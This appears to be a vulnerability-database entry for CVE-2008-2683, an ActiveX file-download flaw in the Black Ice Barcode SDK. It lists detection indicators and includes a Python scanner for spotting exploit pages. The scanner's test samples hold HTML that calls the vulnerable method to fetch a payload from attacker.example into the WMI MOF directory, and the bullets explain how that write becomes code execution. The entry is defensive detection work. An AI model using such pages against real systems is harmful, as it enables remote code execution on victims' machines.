CVE-2008-2683
published 2008-06-12

Priority: P351
CVSS 2.0 base score: 9.3 (critical), vector AV:N/AC:M/Au:N/C:C/I:C/A:C
Public exploit: yes
EPSS: 34.76% (98.2nd percentile)
The BIDIB.BIDIBCtrl.1 ActiveX control in BIDIB.ocx 10.9.3.0 in Black Ice Barcode SDK 5.01 allows remote attackers to force the download and storage of arbitrary files by specifying the origin URL in the first argument to the DownloadImageFileURL method, and the local filename in the second argument. NOTE: some of these details are obtained from third party information.

Affected (1 range)

Vendor      Product       Version range   Fixed in
black_ice   barcode_sdk   (none listed)   (none listed)

Detection & IOCs (extracted from sources)

ProgID:   BIDIB.BIDIBCtrl.1
Filename: BIDIB.ocx
CLSID:    {D2797899-BE27-4CDB-892F-4FDC26EA9BA9} (BIDIB.ocx)
CLSID:    {79956462-F148-497F-B247-DF35A095F80B} (BIImgFrm.ocx)
Method:   DownloadImageFileURL
  • Detect ActiveX instantiation of BIDIB.BIDIBCtrl.1 (CLSID {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}) or BIImgFrm.ocx (CLSID {79956462-F148-497F-B247-DF35A095F80B}) in web content and browser script, whether via an <object classid="clsid:..."> tag or new ActiveXObject("BIDIB.BIDIBCtrl.1"), and in particular calls to the DownloadImageFileURL method with two arguments (remote URL, then local file path). The control performs no validation of either argument, so the attacker chooses both what is fetched and where it lands.
  • Alert on files written to C:\WINDOWS\system32\wbem\mof\ by a browser process. The Metasploit module drops a MOF file there; the WMI service compiles files in that directory automatically, which is what turns the arbitrary file write into code execution.
  • Alert on executable files written to the Startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup\) by a browser or ActiveX host process. The Cover Page SDK exploit variant uses this path for persistence, so the payload runs at the next logon rather than immediately.
  • The module sets InitialAutoRunScript to 'migrate -f', which spawns a fresh process and moves the Meterpreter session into it shortly after the payload starts. The command string itself travels over the C2 channel and does not appear as a host command line, so monitor for process creation followed by cross-process injection originating from the browser process or from the dropped executable.
  • BIDIB.ocx is registered as Safe for Scripting and Safe for Initialization (Implemented Categories {7DD95801-9882-11CF-9FA9-00AA006C42C4} and {7DD95802-9882-11CF-9FA9-00AA006C42C4} under HKCR\CLSID\{CLSID}\), so Internet Explorer instantiates and scripts it from any web page without the "not marked as safe for scripting" prompt. The kill bit is a separate control and is not set by default: audit that Compatibility Flags under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} has 0x00000400 set for both vulnerable CLSIDs, and check for the safe-for-scripting categories on hosts where the SDK is installed.
  • The Metasploit module exploit/windows/browser/blackice_downloadimagefileurl (Cover Page SDK) targets BIImgFrm.ocx 12.0.0.0 (CLSID 79956462-F148-497F-B247-DF35A095F80B) as its primary target, while the original CVE references BIDIB.ocx 10.9.3.0 (CLSID D2797899-BE27-4CDB-892F-4FDC26EA9BA9); both expose the same vulnerable method.
  • The MOF auto-compilation technique the Metasploit module relies on only works on Windows versions before Vista. On Vista and later the dropped MOF file is not compiled automatically, so the module's code-execution step fails there even though the arbitrary file write itself still succeeds.
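As an added example (not from the source advisory or the Metasploit project), the following Python triage scanner applies the first three detection bullets above to captured page content: it flags instantiation of the two vulnerable CLSIDs or the ProgID, extracts DownloadImageFileURL(url, path) calls, and raises severity when the destination path is the MOF directory or the Startup folder. The HTML samples at the bottom are constructed for the demonstration. Regex matching on source text will miss obfuscated script, so this is a triage aid for proxy or sandbox captures, not a complete detection.

```python
"""Triage scanner for CVE-2008-2683: flag web content that instantiates the
vulnerable Black Ice ActiveX controls and calls DownloadImageFileURL."""
import re
from dataclasses import dataclass, field

# Indicators taken from the advisory text: CLSIDs of the two controls, and the ProgID.
VULN_CLSIDS = {
    "D2797899-BE27-4CDB-892F-4FDC26EA9BA9": "BIDIB.ocx (BIDIB.BIDIBCtrl.1)",
    "79956462-F148-497F-B247-DF35A095F80B": "BIImgFrm.ocx (Cover Page SDK)",
}
VULN_PROGIDS = {"BIDIB.BIDIBCtrl.1"}

# Destination directories that turn "write any file" into code execution or persistence.
HIGH_RISK_DIRS = (
    r"\windows\system32\wbem\mof",      # MOF auto-compile -> WMI code execution (pre-Vista)
    r"\start menu\programs\startup",    # runs at next logon
)

_CLSID_RE = re.compile(
    r"clsid:\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
_PROGID_RE = re.compile(r"""ActiveXObject\s*\(\s*["']([^"']+)["']\s*\)""", re.I)
_CALL_RE = re.compile(
    r"""\.DownloadImageFileURL\s*\(\s*["']([^"']*)["']\s*,\s*["']([^"']*)["']\s*\)""",
    re.I)


@dataclass
class Finding:
    controls: list = field(default_factory=list)  # vulnerable controls instantiated
    calls: list = field(default_factory=list)     # (remote_url, local_path, path_severity)

    @property
    def severity(self) -> str:
        if not self.controls and not self.calls:
            return "none"
        if not self.controls:
            # Method name seen but no visible instantiation: possibly obfuscated loader.
            return "low"
        if any(sev == "critical" for _, _, sev in self.calls):
            return "critical"
        return "high" if self.calls else "medium"


def score_path(local_path: str) -> str:
    """Rate the attacker-chosen destination. JavaScript source doubles backslashes,
    so collapse runs of separators before comparing against the known directories."""
    p = re.sub(r"[\\/]+", r"\\", local_path).lower()
    return "critical" if any(d in p for d in HIGH_RISK_DIRS) else "high"


def scan_html(content: str) -> Finding:
    """Scan raw HTML/JavaScript for the CLSIDs, the ProgID and the vulnerable call."""
    f = Finding()
    for clsid in _CLSID_RE.findall(content):
        name = VULN_CLSIDS.get(clsid.upper())
        if name:
            f.controls.append(name)
    for progid in _PROGID_RE.findall(content):
        if progid in VULN_PROGIDS:
            f.controls.append(progid)
    for url, path in _CALL_RE.findall(content):
        f.calls.append((url, path, score_path(path)))
    return f


# Constructed samples (not real captures). The first mirrors the MOF drop pattern.
MALICIOUS_SAMPLE = r"""<html><body>
<object classid="clsid:79956462-F148-497F-B247-DF35A095F80B" id="bi"></object>
<script>
  bi.DownloadImageFileURL("http://attacker.example/payload.mof",
                          "C:\\WINDOWS\\system32\\wbem\\mof\\x.mof");
</script></body></html>"""

PROGID_SAMPLE = r"""<script>
var o = new ActiveXObject("BIDIB.BIDIBCtrl.1");
o.DownloadImageFileURL("http://attacker.example/a.jpg", "C:\\temp\\a.jpg");
</script>"""

BENIGN_SAMPLE = """<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="f"></object>
<script>document.getElementById('f').Play();</script>"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE),
                          ("progid", PROGID_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        result = scan_html(sample)
        print(f"{label:10s} severity={result.severity:8s} controls={result.controls} "
              f"calls={result.calls}")
```

Run it against page bodies pulled from a proxy cache or a sandbox's HTTP capture; anything rated critical warrants pulling the endpoint's wbem\mof and Startup directories as described in the bullets above.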